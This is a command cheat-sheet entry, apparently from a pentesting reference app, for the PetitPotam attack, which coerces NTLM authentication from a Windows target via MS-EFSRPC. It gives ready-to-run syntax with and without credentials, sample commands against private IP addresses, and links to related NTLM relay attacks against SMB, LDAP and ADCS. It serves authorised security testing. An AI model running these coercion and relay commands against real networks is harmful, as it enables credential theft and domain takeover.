PetitPotam Coercion
Coerce NTLM authentication from a target using MS-EFSRPC (PetitPotam)
- Tool
- python3
- Category
- Credential Attacks / NTLM Relay & Coercion
- Platform
- linux
- Requires
- no credentials
- Protocols
- RPC, NTLM
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
python3 PetitPotam.py <listener_ip> <target_ip>
Credential variants
The same attack using a different authentication material.
With Credentials requires password
python3 PetitPotam.py -u '<user>' -p '<password>' -d '<domain>' <listener_ip> <target_ip>
Examples
python3 PetitPotam.py 192.168.1.50 192.168.1.100
python3 PetitPotam.py -u 'user' -p 'password' -d 'corp.local' 192.168.1.50 192.168.1.100
Tags
Related commands
- NTLM Relay to SMB NTLM relay attack targeting SMB service
- NTLM Relay to LDAP Relay NTLM authentication to LDAP to configure RBCD delegation
- NTLM Relay to ADCS Relay NTLM authentication to ADCS web enrollment to obtain a certificate
- Certipy Relay to ADCS Relay NTLM authentication to ADCS web enrollment to obtain a certificate
- Coercer Coerce NTLM authentication using multiple RPC protocols
- Coercer Scan (Find Coercion Vectors) Probe a target for every known authentication-coercion RPC method (PetitPotam,…
- DFSCoerce Coerce NTLM authentication using MS-DFSNM (Distributed File System)
- NetExec coerce_plus Module Unified coercion module — replaces the individual…